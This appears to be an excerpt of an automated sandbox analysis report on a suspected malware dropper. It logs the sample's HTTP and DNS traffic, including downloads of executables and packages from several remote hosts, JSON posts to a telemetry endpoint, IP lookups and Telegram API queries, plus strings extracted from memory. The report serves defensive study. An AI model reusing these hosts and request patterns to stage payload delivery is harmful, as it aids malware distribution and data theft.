    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET /tools/config/installer/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 321
    Source: global trafficHTTP traffic detected: GET /tools/files-to-delete/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET /tools/files/f86d096d-ce60-4b6e-ac60-096d2250693a/ClubShipper.exe HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 1296
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 114
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meAccept: */*
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: ifconfig.me
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/3a9ad13f-de6d-43be-b899-593fefcb45ef HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /v.php HTTP/1.1Host: wetransfers.ioUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficHTTP traffic detected: GET /tools/domains HTTP/1.1Host: swiftvantage.online
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET /tools/config/installer/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET /tools/files-to-delete/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET /tools/files/f86d096d-ce60-4b6e-ac60-096d2250693a/ClubShipper.exe HTTP/1.1Host: boldvertex.store
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meAccept: */*
    Source: global trafficDNS traffic detected: DNS query: swiftvantage.online
    Source: global trafficDNS traffic detected: DNS query: jonatechlab.com
    Source: global trafficDNS traffic detected: DNS query: wetransfers.io
    Source: global trafficDNS traffic detected: DNS query: ifconfig.me
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: global trafficDNS traffic detected: DNS query: boldvertex.store
    Source: unknownHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-t
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.co
    Source: 1.exe, 00000004.00000003.1886222361.0000000008B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/
    Source: 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: MainSoftware.exe, 00000009.00000002.2454127361.000002099848E000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.0000020998475000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.0000020998449000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.00000209984A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jonatechlab.com:443/
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886222361.0000000008B07000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/
    Source: 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repo
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/S%wz
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp, Install.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com)
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp, Install.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
